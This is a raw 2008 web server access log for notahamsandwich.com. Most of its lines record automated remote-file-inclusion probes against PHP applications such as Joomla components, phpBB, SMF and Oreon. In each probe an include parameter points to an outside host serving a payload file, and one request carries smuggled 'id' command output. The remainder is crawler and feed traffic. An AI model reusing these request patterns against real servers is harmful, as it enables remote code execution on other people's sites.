195.12.48.155 - - [26/May/2008:00:40:27 -0700] "GET /logs//zero_vote/ask_password.php?dir=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
195.12.48.155 - - [26/May/2008:00:40:27 -0700] "GET //zero_vote/ask_password.php?dir=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
82.78.216.197 - - [26/May/2008:00:42:40 -0700] "GET //zero_vote/ask_password.php?dir=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.notahamsandwich.com"
82.78.216.197 - - [26/May/2008:00:42:40 -0700] "GET /logs//zero_vote/ask_password.php?dir=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.notahamsandwich.com"
87.106.101.71 - - [26/May/2008:00:43:25 -0700] "GET /logs//zero_vote/ask_password.php?dir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
87.106.101.71 - - [26/May/2008:00:43:25 -0700] "GET //zero_vote/ask_password.php?dir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
212.241.193.243 - - [26/May/2008:00:45:33 -0700] "GET /logs//zero_vote/ask_password.php?dir=http://www.duclaux.net/wiki/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
212.241.193.243 - - [26/May/2008:00:45:33 -0700] "GET //zero_vote/ask_password.php?dir=http://www.duclaux.net/wiki/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
210.1.31.35 - - [26/May/2008:00:46:43 -0700] "GET //authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://www.boxinginsider.com/usa/apache.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.notahamsandwich.com"
210.1.31.35 - - [26/May/2008:00:46:43 -0700] "GET /logs//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://www.boxinginsider.com/usa/apache.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.notahamsandwich.com"
212.241.193.243 - - [26/May/2008:00:47:28 -0700] "GET /logs//zero_vote/ask_password.php?dir=http://www.duclaux.net/wiki/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
212.241.193.243 - - [26/May/2008:00:47:28 -0700] "GET //zero_vote/ask_password.php?dir=http://www.duclaux.net/wiki/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
212.241.193.243 - - [26/May/2008:00:49:56 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.duclaux.net/wiki/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
212.241.193.243 - - [26/May/2008:00:49:56 -0700] "GET //include/lib.inc.php?site_path=http://www.duclaux.net/wiki/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
212.241.193.243 - - [26/May/2008:00:51:14 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.duclaux.net/wiki/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
212.241.193.243 - - [26/May/2008:00:51:15 -0700] "GET //include/lib.inc.php?site_path=http://www.duclaux.net/wiki/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
212.241.251.88 - - [26/May/2008:00:52:19 -0700] "GET /logs/access_080421.log/!scanhttp://ma2day.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
212.241.251.88 - - [26/May/2008:00:52:21 -0700] "GET /!scanhttp://ma2day.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
212.241.251.88 - - [26/May/2008:00:52:21 -0700] "GET /logs/!scanhttp://ma2day.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
212.241.251.88 - - [26/May/2008:00:52:27 -0700] "GET /logs/access_080414.log/!scanhttp://ma2day.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
72.14.199.31 - - [26/May/2008:00:54:12 -0700] "GET /?feed=rss2 HTTP/1.1" 200 514 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 6 subscribers; feed-id=2879958457252815395)" "blog.notahamsandwich.com"
209.62.80.134 - - [26/May/2008:00:58:04 -0700] "GET /logs/poll/booth.php?include_path=http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.notahamsandwich.com"
209.62.80.134 - - [26/May/2008:00:58:04 -0700] "GET /poll/booth.php?include_path=http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.notahamsandwich.com"
67.205.74.75 - - [26/May/2008:01:08:35 -0700] "GET //table.php?spaw_root=http://bigme.com.au//components/com_joomlalib/standalone/idpit.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "notahamsandwich.com"
74.6.17.169 - - [26/May/2008:01:11:54 -0700] "GET /tmp/?N=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.notahamsandwich.com"
158.227.2.24 - - [26/May/2008:01:17:28 -0700] "GET /logs//atom.php5?page=http://bigme.com.au//components/com_joomlalib/standalone/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
158.227.2.24 - - [26/May/2008:01:17:28 -0700] "GET //atom.php5?page=http://bigme.com.au//components/com_joomlalib/standalone/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
212.241.251.88 - - [26/May/2008:01:24:31 -0700] "GET /logs/access_080421.log//appserv/main.php?appserv_root=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
212.241.251.88 - - [26/May/2008:01:24:32 -0700] "GET //appserv/main.php?appserv_root=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
212.241.251.88 - - [26/May/2008:01:24:32 -0700] "GET /logs//appserv/main.php?appserv_root=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
212.241.251.88 - - [26/May/2008:01:25:59 -0700] "GET /logs/access_080414.log//appserv/main.php?appserv_root=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
74.6.19.23 - - [26/May/2008:01:29:56 -0700] "GET /logs/access_080128.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.notahamsandwich.com"
209.62.80.134 - - [26/May/2008:01:33:35 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.notahamsandwich.com"
209.62.80.134 - - [26/May/2008:01:33:35 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.notahamsandwich.com"
195.12.48.155 - - [26/May/2008:01:33:53 -0700] "GET /logs/access_080407.log//zero_vote/ask_password.php?dir=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
87.106.10.53 - - [26/May/2008:01:38:42 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.notahamsandwich.com"
87.106.10.53 - - [26/May/2008:01:38:42 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.notahamsandwich.com"
74.55.113.226 - - [26/May/2008:01:42:44 -0700] "GET /logs/access_080421.log/send_reminders.php?includedir=http://www.gasthof-neumeister.com/images/zoom/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
74.55.113.226 - - [26/May/2008:01:42:45 -0700] "GET /send_reminders.php?includedir=http://www.gasthof-neumeister.com/images/zoom/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
74.55.113.226 - - [26/May/2008:01:42:45 -0700] "GET /logs/send_reminders.php?includedir=http://www.gasthof-neumeister.com/images/zoom/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
85.214.68.130 - - [26/May/2008:01:43:02 -0700] "GET /pollphp/lang/german.php?lang[Templates]=http://www.rsiservers.com/gb/new/public/root.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
67.205.74.75 - - [26/May/2008:01:44:34 -0700] "GET /logs/access.log//table.php?spaw_root=http://bigme.com.au//components/com_joomlalib/standalone/idpit.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "notahamsandwich.com"
67.205.74.75 - - [26/May/2008:01:44:34 -0700] "GET /logs//table.php?spaw_root=http://bigme.com.au//components/com_joomlalib/standalone/idpit.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "notahamsandwich.com"
85.214.72.189 - - [26/May/2008:01:45:20 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.notahamsandwich.com"
85.214.72.189 - - [26/May/2008:01:45:20 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.notahamsandwich.com"
85.214.68.130 - - [26/May/2008:01:45:54 -0700] "GET /logs/access_080407.log/pollphp/lang/german.php?lang[Templates]=http://www.rsiservers.com/gb/new/public/root.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
85.214.68.130 - - [26/May/2008:01:45:55 -0700] "GET /pollphp/lang/german.php?lang[Templates]=http://www.rsiservers.com/gb/new/public/root.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
85.214.68.130 - - [26/May/2008:01:45:55 -0700] "GET /logs/pollphp/lang/german.php?lang[Templates]=http://www.rsiservers.com/gb/new/public/root.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
64.38.4.3 - - [26/May/2008:01:46:33 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.notahamsandwich.com"
64.38.4.3 - - [26/May/2008:01:46:33 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.notahamsandwich.com"
75.125.252.82 - - [26/May/2008:01:47:45 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
75.125.252.82 - - [26/May/2008:01:47:45 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
74.53.25.178 - - [26/May/2008:01:48:20 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
74.53.25.178 - - [26/May/2008:01:48:20 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
85.214.68.130 - - [26/May/2008:01:48:43 -0700] "GET /logs/access_080407.log/pollphp/lang/german.php?lang[Templates]=http://www.rsiservers.com/gb/new/public/root.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
85.214.68.130 - - [26/May/2008:01:48:43 -0700] "GET /pollphp/lang/german.php?lang[Templates]=http://www.rsiservers.com/gb/new/public/root.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
85.214.68.130 - - [26/May/2008:01:48:44 -0700] "GET /logs/pollphp/lang/german.php?lang[Templates]=http://www.rsiservers.com/gb/new/public/root.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
85.214.68.130 - - [26/May/2008:01:50:00 -0700] "GET /logs/access_080414.log/pollphp/lang/german.php?lang[Templates]=http://www.rsiservers.com/gb/new/public/root.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
62.75.184.73 - - [26/May/2008:02:07:46 -0700] "GET /logs/access_080407.log//ashnews.php?pathtoashnews=http://correio-virtual.co.cc/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
62.75.184.73 - - [26/May/2008:02:07:47 -0700] "GET //ashnews.php?pathtoashnews=http://correio-virtual.co.cc/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
62.75.184.73 - - [26/May/2008:02:07:47 -0700] "GET /logs//ashnews.php?pathtoashnews=http://correio-virtual.co.cc/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
62.75.184.73 - - [26/May/2008:02:07:47 -0700] "GET /logs/access_080414.log//ashnews.php?pathtoashnews=http://correio-virtual.co.cc/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
212.241.193.243 - - [26/May/2008:02:07:56 -0700] "GET /logs/access_080414.log//zero_vote/ask_password.php?dir=http://www.duclaux.net/wiki/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
62.75.184.73 - - [26/May/2008:02:08:01 -0700] "GET /logs/access_080421.log//atom.php5?page=http://correio-virtual.co.cc/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
88.131.106.8 - - [26/May/2008:02:08:22 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.notahamsandwich.com"
88.131.106.8 - - [26/May/2008:02:08:22 -0700] "GET / HTTP/1.0" 200 896 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.notahamsandwich.com"
72.14.199.38 - - [26/May/2008:02:09:02 -0700] "GET /?feed=rss2 HTTP/1.1" 200 514 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 6 subscribers; feed-id=2879958457252815395)" "blog.notahamsandwich.com"
83.133.125.202 - - [26/May/2008:02:25:10 -0700] "GET / HTTP/1.1" 200 912 "http://www.BigFinder.de/index.php" "Opera/8.53 (Windows NT 5.1; U; de)" "www.notahamsandwich.com"
74.55.113.226 - - [26/May/2008:02:26:49 -0700] "GET /logs/access_080421.log/send_reminders.php?includedir=http://www.gasthof-neumeister.com/images/zoom/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
74.55.113.226 - - [26/May/2008:02:26:49 -0700] "GET /send_reminders.php?includedir=http://www.gasthof-neumeister.com/images/zoom/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
74.55.113.226 - - [26/May/2008:02:26:49 -0700] "GET /logs/send_reminders.php?includedir=http://www.gasthof-neumeister.com/images/zoom/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
212.241.193.243 - - [26/May/2008:02:29:11 -0700] "GET /logs/access_080414.log//zero_vote/ask_password.php?dir=http://www.duclaux.net/wiki/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
72.14.199.86 - - [26/May/2008:03:12:04 -0700] "GET /?feed=rss2 HTTP/1.1" 200 514 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 6 subscribers; feed-id=2879958457252815395)" "blog.notahamsandwich.com"
80.67.23.140 - - [26/May/2008:03:34:03 -0700] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://scaneru.nm.ru/idv.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.notahamsandwich.com"
80.67.23.140 - - [26/May/2008:03:34:03 -0700] "GET /logs/access.log/doceboCms/class/class.dashboard_cms.php?where_framework=http://scaneru.nm.ru/idv.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.notahamsandwich.com"
80.67.23.140 - - [26/May/2008:03:34:03 -0700] "GET /logs/doceboCms/class/class.dashboard_cms.php?where_framework=http://scaneru.nm.ru/idv.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.notahamsandwich.com"
85.214.68.130 - - [26/May/2008:03:37:06 -0700] "GET /logs/errors.php?error=http://www.rsiservers.com/gb/new/public/root.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
85.214.68.130 - - [26/May/2008:03:37:06 -0700] "GET /errors.php?error=http://www.rsiservers.com/gb/new/public/root.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
80.67.23.140 - - [26/May/2008:03:52:12 -0700] "GET /logs/partner_help.php/oneadmin/newspublish//include.php?path[docroot]=http://scaneru.nm.ru/idv.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.notahamsandwich.com"
80.67.23.140 - - [26/May/2008:03:52:12 -0700] "GET /partner_help.php/oneadmin/newspublish//include.php?path[docroot]=http://scaneru.nm.ru/idv.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.notahamsandwich.com"
74.6.17.169 - - [26/May/2008:03:56:32 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.notahamsandwich.com"
74.6.17.169 - - [26/May/2008:03:56:32 -0700] "GET /blog/?S=A HTTP/1.0" 200 506 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.notahamsandwich.com"
80.67.23.140 - - [26/May/2008:03:56:35 -0700] "GET /logs/access.log/partner_help.php/oneadmin/newspublish//include.php?path[docroot]=http://scaneru.nm.ru/idv.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.notahamsandwich.com"
74.54.81.132 - - [26/May/2008:04:07:08 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
74.54.81.132 - - [26/May/2008:04:07:08 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
72.14.199.31 - - [26/May/2008:04:12:04 -0700] "GET /?feed=rss2 HTTP/1.1" 200 514 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 6 subscribers; feed-id=2879958457252815395)" "blog.notahamsandwich.com"
208.80.193.30 - - [26/May/2008:04:54:22 -0700] "GET / HTTP/1.1" 200 912 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20021018)" "www.notahamsandwich.com"
74.54.81.132 - - [26/May/2008:05:07:27 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
74.54.81.132 - - [26/May/2008:05:07:27 -0700] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
72.14.199.38 - - [26/May/2008:05:12:08 -0700] "GET /?feed=rss2 HTTP/1.1" 200 514 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 6 subscribers; feed-id=2879958457252815395)" "blog.notahamsandwich.com"
89.218.85.18 - - [26/May/2008:05:14:24 -0700] "GET //?pg=http://ucil.110mb.com/img.jpg? HTTP/1.1" 200 912 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
64.38.4.3 - - [26/May/2008:05:16:11 -0700] "GET ///modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.notahamsandwich.com"
64.38.4.3 - - [26/May/2008:05:16:11 -0700] "GET /logs///modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.notahamsandwich.com"
85.214.72.189 - - [26/May/2008:05:16:26 -0700] "GET ///modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.notahamsandwich.com"
85.214.72.189 - - [26/May/2008:05:16:26 -0700] "GET /logs///modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.notahamsandwich.com"
208.36.144.8 - - [26/May/2008:05:18:27 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuill.com/twiceler/robot.html)" "www.notahamsandwich.com"
74.6.18.218 - - [26/May/2008:05:28:04 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.notahamsandwich.com"
74.6.18.218 - - [26/May/2008:05:28:05 -0700] "GET /tmp/?M=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.notahamsandwich.com"
213.194.149.65 - - [26/May/2008:05:34:09 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
213.194.149.65 - - [26/May/2008:05:34:09 -0700] "GET //include/bbs.lib.inc.php?site_path=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
74.54.81.132 - - [26/May/2008:05:35:39 -0700] "GET /logs/access_080414.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
125.164.97.84 - - [26/May/2008:06:05:03 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)" "www.notahamsandwich.com"
125.164.97.84 - - [26/May/2008:06:05:04 -0700] "GET /logs/access.log HTTP/1.1" 200 48257 "http://www.google.co.id/search?hl=id&q=/squirrelcart/cart_content.php%3Fcart_isp_root%3D&start=10&sa=N" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)" "www.notahamsandwich.com"
38.99.13.125 - - [26/May/2008:06:05:04 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuill.com/twiceler/robot.html)" "blog.notahamsandwich.com"
125.164.97.84 - - [26/May/2008:06:07:41 -0700] "GET / HTTP/1.1" 200 912 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)" "www.notahamsandwich.com"
125.164.97.84 - - [26/May/2008:06:07:46 -0700] "GET /logs/ HTTP/1.1" 200 7236 "http://www.notahamsandwich.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)" "www.notahamsandwich.com"
125.164.97.84 - - [26/May/2008:06:08:05 -0700] "GET /logs/access_080519.log HTTP/1.1" 200 262144 "http://www.notahamsandwich.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)" "www.notahamsandwich.com"
72.14.199.31 - - [26/May/2008:06:12:14 -0700] "GET /?feed=rss2 HTTP/1.1" 200 514 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 6 subscribers; feed-id=2879958457252815395)" "blog.notahamsandwich.com"
